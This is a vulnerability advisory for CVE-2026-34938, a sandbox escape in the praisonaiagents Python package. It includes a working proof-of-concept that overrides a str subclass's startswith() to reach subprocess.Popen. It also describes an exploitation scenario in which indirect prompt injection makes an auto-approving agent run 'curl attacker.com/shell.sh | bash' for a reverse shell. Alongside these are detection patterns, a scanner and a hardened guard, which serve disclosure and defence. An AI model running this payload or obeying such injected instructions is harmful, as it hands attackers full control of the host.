CVE-2026-34938: praisonaiagents: sandbox bypass enables full host RCE

GHSA-6vh2-h83c-9294 CRITICAL CISA: ATTEND
Published April 1, 2026
CISO Take

Patch praisonaiagents to 1.5.90 immediately — this is a CVSS 10 sandbox escape that delivers unauthenticated OS command execution with no user interaction required. Any deployment using execute_code() is fully compromised, and the default PRAISONAI_AUTO_APPROVE=true in bot/autonomy modes means indirect prompt injection silently triggers RCE without human confirmation. Until patched, disable or sandbox any agent pipeline that invokes execute_code().

What is the risk?

Maximum exploitability: CVSS 10.0 with a network vector, no privileges, no user interaction, and a scope change (C:H/I:H/A:H). The public PoC lowers the exploitation bar to script-kiddie level now that it is disclosed. PraisonAI is a widely used multi-agent orchestration framework in enterprise AI pipelines, so exposure is broad. Auto-approval defaults dramatically amplify the blast radius — a single indirect prompt injection in a document, email, or web result processed by the agent is enough to achieve code execution with no human in the loop.

What systems are affected?

Package          Ecosystem  Vulnerable Range  Patched
praisonaiagents  pip        <= 1.5.89         1.5.90

11 dependents; 86% patched; ~0d to patch

Do you use praisonaiagents? You're affected.

Severity & Risk

CVSS 3.1
10.0 / 10
EPSS
0.1%
chance of exploitation in 30 days
Higher than 20% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Moderate
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV (Attack Vector)        Network
AC (Attack Complexity)    Low
PR (Privileges Required)  None
UI (User Interaction)     None
S  (Scope)                Changed
C  (Confidentiality)      High
I  (Integrity)            High
A  (Availability)         High

What should I do?

6 steps
  1. PATCH NOW

    Upgrade praisonaiagents to >= 1.5.90 (pip install --upgrade praisonaiagents).

  2. DISABLE AUTO-APPROVE

    Remove or override PRAISONAI_AUTO_APPROVE=true in all bot/autonomy deployments.

  3. ISOLATE

    Run any agent with code execution capability in a dedicated container or VM with no access to sensitive credentials, internal networks, or host filesystem.

  4. LEAST PRIVILEGE

    Ensure the process user running the agent has minimal OS permissions.

  5. DETECT

    Log and alert on any invocation of execute_code() — look for __subclasses__, Popen, subprocess, or FakeStr patterns in code payloads.

  6. AUDIT

    Review agent tool definitions and restrict execute_code() to trusted, human-reviewed inputs only.
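The DETECT step above lists string indicators to look for in code payloads, but the PoC on this page assembles its dunder names from single characters and aliases `type`, so a literal match alone is not enough. The following scanner is an added example, not code from this advisory or from the PraisonAI project: it applies the four literal indicators named in step 5 and adds three structural checks of my own (assumptions, not anything the page attributes to the vendor): a `str` subclass created through `type()` or an alias of it, a string assembled from one-character literals with `''.join()`, and `getattr()` called with a non-literal name. The three sample payloads are constructed for the demo.

```python
import ast

# Literal indicators named in the DETECT step of this advisory.
LITERAL_INDICATORS = ("__subclasses__", "Popen", "subprocess", "FakeStr")


def _type_aliases(tree: ast.AST) -> set[str]:
    """Collect names bound directly to the builtin type(), e.g. `t = type`."""
    aliases = {"type"}
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign) and isinstance(node.value, ast.Name) and node.value.id in aliases:
            aliases.update(t.id for t in node.targets if isinstance(t, ast.Name))
    return aliases


def _str_subclass_via_type(call: ast.Call, aliases: set[str]) -> bool:
    """type(name, (str, ...), namespace): a str subclass built without the class keyword."""
    if not (isinstance(call.func, ast.Name) and call.func.id in aliases):
        return False
    if len(call.args) != 3 or not isinstance(call.args[1], ast.Tuple):
        return False
    return any(isinstance(b, ast.Name) and b.id == "str" for b in call.args[1].elts)


def _string_from_single_chars(call: ast.Call) -> bool:
    """''.join([...]) over one-character literals: a name assembled to dodge literal matching."""
    func = call.func
    if not (isinstance(func, ast.Attribute) and func.attr == "join"
            and isinstance(func.value, ast.Constant) and func.value.value == ""):
        return False
    if len(call.args) != 1 or not isinstance(call.args[0], (ast.List, ast.Tuple)):
        return False
    elts = call.args[0].elts
    return len(elts) > 1 and all(
        isinstance(e, ast.Constant) and isinstance(e.value, str) and len(e.value) == 1 for e in elts
    )


def _dynamic_getattr(call: ast.Call) -> bool:
    """getattr(obj, name) where the name is not a string literal."""
    return (isinstance(call.func, ast.Name) and call.func.id == "getattr"
            and len(call.args) >= 2 and not isinstance(call.args[1], ast.Constant))


def scan_payload(code: str) -> list[str]:
    """Return the indicators found in a code payload (an empty list means nothing was flagged)."""
    findings = [f"literal:{tok}" for tok in LITERAL_INDICATORS if tok in code]
    try:
        tree = ast.parse(code)
    except SyntaxError:
        # A payload that does not even parse deserves a look on its own.
        return findings + ["unparseable"]
    aliases = _type_aliases(tree)
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        if _str_subclass_via_type(node, aliases):
            findings.append("str-subclass-via-type")
        if _string_from_single_chars(node):
            findings.append("string-assembled-from-chars")
        if _dynamic_getattr(node):
            findings.append("getattr-dynamic-name")
    return findings


# Constructed samples for the demo (not taken from any real incident).
BENIGN_SAMPLE = "import math\nprint(math.sqrt(2))\n"
LITERAL_SAMPLE = "import subprocess\nsubprocess.Popen(['id'])\n"
# Mirrors the PoC's obfuscation style while containing none of the four literal tokens.
OBFUSCATED_SAMPLE = (
    "t = type\n"
    "Fake = t('Fake', (str,), {'startswith': lambda self, *a: False})\n"
    "attr = Fake(''.join(['_', '_', 'c', 'l', 'a', 's', 's', '_', '_']))\n"
    "print(getattr((), attr))\n"
)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SAMPLE), ("literal", LITERAL_SAMPLE), ("obfuscated", OBFUSCATED_SAMPLE)):
        print(f"{label:>10}: {scan_payload(sample) or 'clean'}")
```

Run `scan_payload()` on every payload handed to execute_code() before (or instead of) executing it and alert on any non-empty result; the obfuscated sample trips all three structural checks and none of the literal ones, which is the gap a grep-only rule leaves open.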

CISA SSVC Assessment

Decision Attend
Exploitation poc
Automatable Yes
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
  Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
  A.6.1.4 - Risk assessment for AI system
  A.6.2.6 - AI system security
NIST AI RMF
  MANAGE-2.2 - Mechanisms exist to sustain deployment of AI with appropriate oversight
  MAP-5.1 - Likelihood and magnitude of each AI risk driver is examined
OWASP LLM Top 10
  LLM02 - Insecure Output Handling
  LLM07 - Insecure Plugin Design
  LLM08 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-34938?

CVE-2026-34938 is a critical (CVSS 10.0) sandbox escape in praisonaiagents versions <= 1.5.89. execute_code() runs attacker-controlled Python inside a sandbox whose _safe_getattr guard can be bypassed with a str subclass that overrides startswith(), giving OS command execution as the process user with no authentication and no user interaction. Because bot/autonomy modes default to PRAISONAI_AUTO_APPROVE=true, an indirect prompt injection can trigger it without human confirmation. The fix is in 1.5.90; until patched, disable or sandbox any agent pipeline that invokes execute_code().

Is CVE-2026-34938 actively exploited?

No confirmed active exploitation of CVE-2026-34938 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-34938?

1. PATCH NOW: Upgrade praisonaiagents to >= 1.5.90 (pip install --upgrade praisonaiagents).
2. DISABLE AUTO-APPROVE: Remove or override PRAISONAI_AUTO_APPROVE=true in all bot/autonomy deployments.
3. ISOLATE: Run any agent with code execution capability in a dedicated container or VM with no access to sensitive credentials, internal networks, or host filesystem.
4. LEAST PRIVILEGE: Ensure the process user running the agent has minimal OS permissions.
5. DETECT: Log and alert on any invocation of execute_code() — look for __subclasses__, Popen, subprocess, or FakeStr patterns in code payloads.
6. AUDIT: Review agent tool definitions and restrict execute_code() to trusted, human-reviewed inputs only.

What systems are affected by CVE-2026-34938?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, agentic pipelines with code execution tools, RAG pipelines with autonomous agents, multi-agent orchestration systems, AI-powered automation bots.

What is the CVSS score for CVE-2026-34938?

CVE-2026-34938 has a CVSS v3.1 base score of 10.0 (CRITICAL). The EPSS exploitation probability is 0.07%.

Technical Details

NVD Description

### Summary

`execute_code()` in `praisonai-agents` runs attacker-controlled Python inside a three-layer sandbox that can be fully bypassed by passing a `str` subclass with an overridden `startswith()` method to the `_safe_getattr` wrapper, achieving arbitrary OS command execution on the host.

### Details

`python_tools.py:20` (source) -> `python_tools.py:22` (guard bypass) -> `python_tools.py:161` (sink)

```python
# source -- _safe_getattr accepts any str subclass
def _safe_getattr(obj, name, *default):
    if isinstance(name, str) and name.startswith('_'):  # isinstance passes for subclasses
        raise AttributeError(...)

# hop -- type() is whitelisted in safe_builtins, creates str subclass without class keyword
FakeStr = type('FakeStr', (str,), {'startswith': lambda self, *a: False})

# sink -- Popen reached via __subclasses__ walk
r = Popen(['id'], stdout=PIPE, stderr=PIPE)
```

### PoC

```python
from praisonaiagents.tools.python_tools import execute_code

payload = """
t = type
FakeStr = t('FakeStr', (str,), {'startswith': lambda self, *a: False})
mro_attr = FakeStr(''.join(['_','_','m','r','o','_','_']))
subs_attr = FakeStr(''.join(['_','_','s','u','b','c','l','a','s','s','e','s','_','_']))
mod_attr = FakeStr(''.join(['_','_','m','o','d','u','l','e','_','_']))
name_attr = FakeStr(''.join(['_','_','n','a','m','e','_','_']))
PIPE = -1
obj_class = getattr(type(()), mro_attr)[1]
for cls in getattr(obj_class, subs_attr)():
    try:
        m = getattr(cls, mod_attr, '')
        n = getattr(cls, name_attr, '')
        if m == 'subprocess' and n == 'Popen':
            r = cls(['id'], stdout=PIPE, stderr=PIPE)
            out, err = r.communicate()
            print('RCE:', out.decode())
            break
    except Exception as e:
        print('ERR:', e)
"""

result = execute_code(code=payload)
print(result)
# expected output: RCE: uid=1000(narey) gid=1000(narey) groups=1000(narey)...
```

### Impact

Any user or agent pipeline running `execute_code()` is exposed to full OS command execution as the process user. Deployments using `bot.py`, `autonomy_mode.py`, or `bots_cli.py` set `PRAISONAI_AUTO_APPROVE=true` by default, meaning no human confirmation is required and the tool fires silently when triggered via indirect prompt injection.
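The guard quoted in the Details section fails for two separable reasons: `isinstance(name, str)` admits subclasses, and `name.startswith('_')` dispatches to whatever the subclass defines. The following is an added example, written for this page and not the project's code; in particular it is not the change shipped in 1.5.90, which this advisory does not describe. `safe_getattr_vulnerable` keeps the shape of the quoted `_safe_getattr`, `safe_getattr_hardened` refuses anything whose type is not exactly `str` and calls `str.startswith` directly so that no override is reachable, and `_OverridingStr` is a constructed subclass standing in for the PoC's FakeStr.

```python
class _OverridingStr(str):
    """Constructed for this demo: a str subclass whose startswith() always answers False,
    the same trick the advisory's PoC builds at runtime with type()."""

    def startswith(self, *args, **kwargs):
        return False


def safe_getattr_vulnerable(obj, name, *default):
    """Same shape as the _safe_getattr guard quoted in the advisory.
    isinstance() admits str subclasses, and name.startswith() dispatches to the
    subclass's override, so the underscore check can be made to answer False."""
    if isinstance(name, str) and name.startswith("_"):
        raise AttributeError(f"access to {name!r} is blocked")
    return getattr(obj, name, *default)


def safe_getattr_hardened(obj, name, *default):
    """Two independent fixes (assumption: one reasonable hardening, not the project's patch).
    1. Exact type check: a subclass, which may override any method, is refused outright.
    2. The base-class implementation is called explicitly (str.startswith), so the
       decision never goes through method resolution on the untrusted object."""
    if type(name) is not str:
        raise TypeError("attribute name must be a plain str")
    if str.startswith(name, "_"):
        raise AttributeError(f"access to {name!r} is blocked")
    return getattr(obj, name, *default)


def guard_blocks(guard, name) -> bool:
    """True if `guard` refuses to resolve `name` on an empty tuple, False if it hands it back."""
    try:
        guard((), name)
    except (AttributeError, TypeError):
        return True
    return False


def compare_guards() -> dict:
    """Run both guards against a plain dunder name, the overriding subclass, and a benign name."""
    evil = _OverridingStr("__class__")
    return {
        "vulnerable/plain dunder": guard_blocks(safe_getattr_vulnerable, "__class__"),
        "vulnerable/overriding subclass": guard_blocks(safe_getattr_vulnerable, evil),
        "hardened/plain dunder": guard_blocks(safe_getattr_hardened, "__class__"),
        "hardened/overriding subclass": guard_blocks(safe_getattr_hardened, evil),
        "hardened/benign name": guard_blocks(safe_getattr_hardened, "count"),
    }


if __name__ == "__main__":
    for case, blocked in compare_guards().items():
        print(f"{case:<32} {'blocked' if blocked else 'ALLOWED'}")
```

The vulnerable guard lets the overriding subclass through while blocking the same name as a plain string; the hardened guard blocks both and still resolves ordinary names. A stricter `getattr` wrapper is only one layer: the advisory notes that `type` itself is whitelisted in the sandbox's `safe_builtins`, which is what lets the payload mint a `str` subclass in the first place, so the isolation and least-privilege steps above still apply to any deployment that exposes code execution at all.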

Exploitation Scenario

An attacker embeds a malicious prompt in a publicly accessible document or web page that an autonomous PraisonAI agent crawls as part of its workflow (indirect prompt injection). The injected prompt instructs the agent to call execute_code() with the PoC payload. Because PRAISONAI_AUTO_APPROVE=true is the default in autonomy_mode.py, the agent executes the payload silently — no human confirmation dialog appears. The payload walks Python's __subclasses__ chain to reach subprocess.Popen, executes 'curl attacker.com/shell.sh | bash', and establishes a reverse shell. From there, the attacker pivots to any credentials, APIs, or data sources accessible to the agent process.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Timeline

Published
April 1, 2026
Last Modified
April 1, 2026
First Seen
April 2, 2026

Related Vulnerabilities